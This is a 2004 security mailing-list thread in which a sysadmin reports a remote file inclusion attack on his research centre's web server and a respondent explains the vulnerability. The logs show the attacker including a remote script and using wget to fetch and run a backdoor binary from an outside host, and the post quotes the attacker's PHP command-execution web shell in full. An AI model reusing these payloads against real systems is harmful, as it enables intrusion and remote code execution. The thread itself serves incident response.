[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Hack attempt
Hi-
It appears that the file <some script>.php is vulnerable to a file
injection. Basically what that means is that is accepts what ever value
someone put into the bodyfile variable and inserts its code before
parsing the script. This allows the attacker to run what ever code as
the user that your web server runs as. You will need to fix the code to
not allow inserting remote files.
If you need anymore information, feel free to reply and I will try to
help.
Kevin Johnson
On Wed, 2004-07-21 at 11:02, Norbert Crettol wrote:
> Hi all.
>
> This is my first post here. I'm Norbert Crettol, one of the sysadmins
> of Idiap, a research center in Switzerland (www.idiap.ch).
>
> We've had a undesired visitor, last night, that I discovered in the
> reports of tripwire.
>
> Here are the logs we got (we get a remote copy of the web server logs
> in another host). As of the second line, I've stripped the head and
> the tail of the line which is allways the same.
> --- begin ---
> "GET /<some script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=/sbin/ifconfig%20-a
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/;ls%20-la
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;ls%20-la
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;chmod%20755%20bind2080
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;./bind2080
> --- end ---
> I've seen no other
>
> It looks like bind8080 has created a directory /var/lock/.tmp
> and expanded an (owned by the web server owner) archive there. Here
> is the list of the files :
> 3225 jui 20 03:53 c-leet
> 15 jui 20 03:47 c-leet.dir
> 51 jui 20 03:47 cron.d
> 512 mai 12 2002 doc/
> 14 jui 21 16:27 eggdrop -> eggdrop-1.6.10*
> 2523568 mai 12 2002 eggdrop-1.6.10*
> 512 mai 12 2002 filesys/
> 343 fÃv 11 03:55 fuck*
> 512 mai 12 2002 help/
> 21149 nov 4 2003 kik*
> 1024 jui 21 11:00 language/
> 512 mai 12 2002 logs/
> 6 jui 20 03:48 pid.CaEm-
> 23065 jan 29 15:00 proc*
> 6 jui 20 03:48 psybnc.pid
> 28591 mai 12 2002 README
> 89 jui 20 03:53 run*
> 588 avr 1 10:00 run-*
> 708 avr 1 10:00 run--*
> 512 mar 31 08:12 scripts/
> 512 mai 12 2002 text/
> 2523568 mar 28 01:41 vi*
> 30293 nov 17 2002 xhide*
> 182 jui 20 03:47 y2kupdate*
>
> Here is the content of http://www.bosscalvin.com/inject.txt :
> --- begin ---
> <font color="red">
> <br><font face="Comic Sans MS" size="2"><center>
> <b>CMD</b> - System Command<br><br></center></font><font face="Verdana" size="1"></center><br>
> <b>#</b> CMD PHP : <br>
> <b>#</b> Released by : <b>SecurityCorp</b><br>
> <b>#</b> Edited by CaEm
> <br>
> <br>
> <hr color="red" width=751px height=115px>
> <br>
> <pre><font face="Verdana" size="1">
> <?
> // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
> if (isset($chdir)) @chdir($chdir);
> ob_start();
> system("$cmd 1> /tmp/nobody 2>&1; cat /tmp/nobody; rm -rf /tmp/nobody");
> $output = ob_get_contents();
> ob_end_clean();
> if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
> ?>
> </font></pre>
> <br>
> <hr color="red" width=751px height=115px>
> <br>
> <font face="Comic Sans MS" size="1"><b> CaEm  </b><br><b>@ </b><b> ÃrÃ.ÃÃÂ.ÃÃt <i>#Renjana</i></b><br>
> --- end ---
>
> Has someone seen this kind of attack ? (chkrootkit doesn't detect it).
> Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org) ?
> Is there a way to stop this guy ? His nickname (CaEm) appears in the
> the uploaded scripts.
>
> Norbert
>
- References:
- Hack attempt
- From: Norbert Crettol <norbert.crettol@idiap.ch>